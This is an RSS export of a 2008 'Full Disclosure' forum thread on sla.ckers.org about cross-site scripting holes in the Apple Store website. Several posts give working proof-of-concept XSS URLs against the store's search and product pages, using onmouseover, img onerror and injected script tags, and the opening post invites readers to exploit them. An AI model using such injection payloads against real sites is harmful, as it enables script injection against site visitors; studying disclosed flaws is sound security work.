<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>store.apple.com xss</title>
        <description>I emailed apple twice about an issue on the apple store search. They did not fix it for over a MONTH and never mailed me back either. They &amp;quot;fixed&amp;quot; it now, but they did a lousy job at it.

httx://store.apple.com/us/search?find=&amp;quot;+onmouseover=&amp;quot;alert(1)&amp;quot;

this will not work if you urlencode the &amp;quot;

anyway, originally it would allow anything, now it strips tags but it will allows attribute based exploits, so knock yourself out.

The reason I'm disclosing this now is because I really can't be bothered to run after apple, if they refuse to reply in a bearable time span or follow my advice.</description>
        <link>http://sla.ckers.org/forum/read.php?3,23576,23576#msg-23576</link>
        <lastBuildDate>Sun, 19 May 2013 18:02:45 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,23576,25748#msg-25748</guid>
            <title>Re: store.apple.com xss</title>
            <link>http://sla.ckers.org/forum/read.php?3,23576,25748#msg-25748</link>
            <description><![CDATA[Not okay!  Good finds.<br />
<br />
-Dan]]></description>
            <dc:creator>DoctorDan</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Thu, 25 Dec 2008 22:34:57 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,23576,25734#msg-25734</guid>
            <title>Re: store.apple.com xss</title>
            <link>http://sla.ckers.org/forum/read.php?3,23576,25734#msg-25734</link>
            <description><![CDATA[Nice guys!<br />
Both patched, check this out...<br />
<br />
http://store.apple.com/us/product/TU243LL/A?fnode=MTY1NDA4Mg&amp;mco=MjQyMDQ1OA&amp;s=newest'&quot;&gt;&lt;script&gt;alert(&quot;The apple didn't fell far from the last apple&quot;)&lt;/script&gt;&lt;div id=&quot;]]></description>
            <dc:creator>TheInsider</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Wed, 24 Dec 2008 20:16:49 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,23576,23832#msg-23832</guid>
            <title>Re: store.apple.com xss</title>
            <link>http://sla.ckers.org/forum/read.php?3,23576,23832#msg-23832</link>
            <description><![CDATA[huh, looks like my browser was just being weird or something. they didn't fix it...]]></description>
            <dc:creator>Kyo</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Mon, 04 Aug 2008 20:27:43 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,23576,23824#msg-23824</guid>
            <title>Re: store.apple.com xss</title>
            <link>http://sla.ckers.org/forum/read.php?3,23576,23824#msg-23824</link>
            <description><![CDATA[<pre class="bbcode">http://store.apple.com/us/search?find=%22%3E%3Cimg%20src=%22.%22%20onerror=%22alert(1)%22%3Cinput</pre>
<br />
without onmouseover ^^<br />
works in Firefox 2]]></description>
            <dc:creator>Jiu</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Mon, 04 Aug 2008 16:20:21 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,23576,23813#msg-23813</guid>
            <title>Re: store.apple.com xss</title>
            <link>http://sla.ckers.org/forum/read.php?3,23576,23813#msg-23813</link>
            <description><![CDATA[Still works.  Seriously.  How lame!  PCI anyone?]]></description>
            <dc:creator>rsnake</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 03 Aug 2008 22:21:04 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,23576,23578#msg-23578</guid>
            <title>Re: store.apple.com xss</title>
            <link>http://sla.ckers.org/forum/read.php?3,23576,23578#msg-23578</link>
            <description><![CDATA[shweet!]]></description>
            <dc:creator>thrill</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 18 Jul 2008 15:28:38 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,23576,23576#msg-23576</guid>
            <title>store.apple.com xss</title>
            <link>http://sla.ckers.org/forum/read.php?3,23576,23576#msg-23576</link>
            <description><![CDATA[I emailed apple twice about an issue on the apple store search. They did not fix it for over a MONTH and never mailed me back either. They &quot;fixed&quot; it now, but they did a lousy job at it.<br />
<br />
httx://store.apple.com/us/search?find=&quot;+onmouseover=&quot;alert(1)&quot;<br />
<br />
this will not work if you urlencode the &quot;<br />
<br />
anyway, originally it would allow anything, now it strips tags but it will allows attribute based exploits, so knock yourself out.<br />
<br />
The reason I'm disclosing this now is because I really can't be bothered to run after apple, if they refuse to reply in a bearable time span or follow my advice.]]></description>
            <dc:creator>Kyo</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 18 Jul 2008 13:28:30 -0500</pubDate>
        </item>
    </channel>
</rss>
